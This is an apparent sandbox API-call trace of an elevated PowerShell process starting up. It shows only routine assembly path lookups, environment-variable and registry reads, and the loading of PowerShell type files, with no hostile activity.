	[0748.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0748.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.165] CoTaskMemAlloc (cb=0x804) returned 0x1b745610
	[0751.165] GetConsoleTitleW (in: lpConsoleTitle=0x1b745610, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0751.166] CoTaskMemFree (pv=0x1b745610) 
	[0751.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0751.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0752.510] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0752.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0752.510] CoTaskMemFree (pv=0x1b742240) 
	[0752.518] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0752.520] CoCreateGuid (in: pguid=0x16def0 | out: pguid=0x16def0*(Data1=0xd885e2c0, Data2=0xa6cb, Data3=0x45c6, Data4=([0]=0x9f, [1]=0x12, [2]=0xcc, [3]=0x45, [4]=0xd6, [5]=0xf6, [6]=0x53, [7]=0x73))) returned 0x0
	[0752.521] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0752.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0752.522] CoTaskMemFree (pv=0x1b742240) 
	[0753.740] WinSqmIsOptedIn () returned 0x0
	[0753.741] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.742] CoTaskMemFree (pv=0x1b742240) 
	[0753.748] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.748] CoTaskMemFree (pv=0x1b742240) 
	[0753.772] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.772] CoTaskMemFree (pv=0x1b742240) 
	[0753.775] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.775] CoTaskMemFree (pv=0x1b742240) 
	[0753.777] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.777] CoTaskMemFree (pv=0x1b742240) 
	[0753.784] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.785] CoTaskMemFree (pv=0x1b742240) 
	[0753.785] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.785] CoTaskMemFree (pv=0x1b742240) 
	[0753.786] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.786] CoTaskMemFree (pv=0x1b742240) 
	[0753.788] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.789] CoTaskMemFree (pv=0x1b742240) 
	[0753.794] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.794] CoTaskMemFree (pv=0x1b742240) 
	[0753.794] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.794] CoTaskMemFree (pv=0x1b742240) 
	[0753.795] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0753.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.795] CoTaskMemFree (pv=0x1b742240) 
	[0767.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0767.107] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0767.107] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0767.107] CoTaskMemFree (pv=0x1b742240) 
	[0767.109] CoTaskMemAlloc (cb=0xcc) returned 0x2961c0
	[0767.109] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2961c0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS欀") returned 0x76
	[0767.109] CoTaskMemFree (pv=0x2961c0) 
	[0767.109] CoTaskMemAlloc (cb=0xf0) returned 0x1b73f740
	[0767.109] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b73f740, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0767.109] CoTaskMemFree (pv=0x1b73f740) 
	[0767.109] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da68 | out: phkResult=0x16da68*=0x328) returned 0x0
	[0767.109] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9ec, lpData=0x0, lpcbData=0x16d9e8*=0x0 | out: lpType=0x16d9ec*=0x2, lpData=0x0, lpcbData=0x16d9e8*=0x6c) returned 0x0
	[0767.109] CoTaskMemAlloc (cb=0x70) returned 0x2e02d0
	[0767.109] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9bc, lpData=0x2e02d0, lpcbData=0x16d9b8*=0x6c | out: lpType=0x16d9bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d9b8*=0x6c) returned 0x0
	[0767.110] CoTaskMemFree (pv=0x2e02d0) 
	[0767.110] CoTaskMemAlloc (cb=0xcc) returned 0x2961c0
	[0767.110] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2961c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0767.110] CoTaskMemFree (pv=0x2961c0) 
	[0767.110] CoTaskMemAlloc (cb=0xcc) returned 0x2961c0
	[0767.110] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2961c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0767.110] CoTaskMemFree (pv=0x2961c0) 
	[0767.114] RegCloseKey (hKey=0x328) returned 0x0
	[0767.114] CoTaskMemAlloc (cb=0xcc) returned 0x2961c0
	[0767.114] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2961c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0767.114] CoTaskMemFree (pv=0x2961c0) 
	[0767.114] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da68 | out: phkResult=0x16da68*=0x328) returned 0x0
	[0767.114] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9ec, lpData=0x0, lpcbData=0x16d9e8*=0x0 | out: lpType=0x16d9ec*=0x0, lpData=0x0, lpcbData=0x16d9e8*=0x0) returned 0x2
	[0767.115] RegCloseKey (hKey=0x328) returned 0x0
	[0767.121] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0767.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.121] CoTaskMemFree (pv=0x1b742240) 
	[0767.123] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0767.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.123] CoTaskMemFree (pv=0x1b742240) 
	[0767.130] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0767.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.130] CoTaskMemFree (pv=0x1b742240) 
	[0767.130] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0767.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.130] CoTaskMemFree (pv=0x1b742240) 
	[0767.132] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d858 | out: phkResult=0x16d858*=0x328) returned 0x0
	[0767.132] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x16d86c, lpData=0x0, lpcbData=0x16d868*=0x0 | out: lpType=0x16d86c*=0x1, lpData=0x0, lpcbData=0x16d868*=0x74) returned 0x0
	[0767.133] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x16d7dc, lpData=0x0, lpcbData=0x16d7d8*=0x0 | out: lpType=0x16d7dc*=0x1, lpData=0x0, lpcbData=0x16d7d8*=0x74) returned 0x0
	[0767.133] CoTaskMemAlloc (cb=0x78) returned 0x2e02d0
	[0767.133] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x16d7ac, lpData=0x2e02d0, lpcbData=0x16d7a8*=0x74 | out: lpType=0x16d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d7a8*=0x74) returned 0x0
	[0767.133] CoTaskMemFree (pv=0x2e02d0) 
	[0767.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0768.685] SetErrorMode (uMode=0x1) returned 0x1
	[0768.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d730 | out: lpFileInformation=0x16d730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0768.685] SetErrorMode (uMode=0x1) returned 0x1
	[0768.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0768.686] SetErrorMode (uMode=0x1) returned 0x1
	[0768.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d730 | out: lpFileInformation=0x16d730*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0768.687] SetErrorMode (uMode=0x1) returned 0x1
	[0768.689] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0768.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0768.689] CoTaskMemFree (pv=0x1b742240) 
	[0768.691] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0768.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0768.691] CoTaskMemFree (pv=0x1b742240) 
	[0768.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0768.700] SetErrorMode (uMode=0x1) returned 0x1
	[0768.700] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0768.701] GetFileType (hFile=0x330) returned 0x1
	[0768.701] SetErrorMode (uMode=0x1) returned 0x1
	[0768.701] GetFileType (hFile=0x330) returned 0x1
	[0768.702] ReadFile (in: hFile=0x330, lpBuffer=0x2c84220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2c84220*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0768.704] ReadFile (in: hFile=0x330, lpBuffer=0x2c84220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2c84220*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0768.705] ReadFile (in: hFile=0x330, lpBuffer=0x2c84220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2c84220*, lpNumberOfBytesRead=0x16d668*=0x1000, lpOverlapped=0x0) returned 1
	[0768.706] ReadFile (in: hFile=0x330, lpBuffer=0x2c84220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2c84220*, lpNumberOfBytesRead=0x16d668*=0xcf3, lpOverlapped=0x0) returned 1
	[0768.706] ReadFile (in: hFile=0x330, lpBuffer=0x2c8367b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2c8367b*, lpNumberOfBytesRead=0x16d668*=0x0, lpOverlapped=0x0) returned 1
	[0768.706] ReadFile (in: hFile=0x330, lpBuffer=0x2c84220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d668, lpOverlapped=0x0 | out: lpBuffer=0x2c84220*, lpNumberOfBytesRead=0x16d668*=0x0, lpOverlapped=0x0) returned 1
	[0768.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0768.709] SetErrorMode (uMode=0x1) returned 0x1
	[0768.709] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d5e0 | out: lpFileInformation=0x16d5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0768.709] SetErrorMode (uMode=0x1) returned 0x1
	[0768.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0768.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6c8 | out: phkResult=0x16d6c8*=0x330) returned 0x0
	[0768.712] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d64c, lpData=0x0, lpcbData=0x16d648*=0x0 | out: lpType=0x16d64c*=0x1, lpData=0x0, lpcbData=0x16d648*=0x56) returned 0x0
	[0768.712] CoTaskMemAlloc (cb=0x5a) returned 0x1b737220
	[0768.712] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d61c, lpData=0x1b737220, lpcbData=0x16d618*=0x56 | out: lpType=0x16d61c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d618*=0x56) returned 0x0
	[0768.712] CoTaskMemFree (pv=0x1b737220) 
	[0768.712] RegCloseKey (hKey=0x330) returned 0x0
	[0768.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0768.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0769.778] VirtualQuery (in: lpAddress=0x16c3b0, lpBuffer=0x16d270, dwLength=0x30 | out: lpBuffer=0x16d270*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0769.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0769.794] SetErrorMode (uMode=0x1) returned 0x1
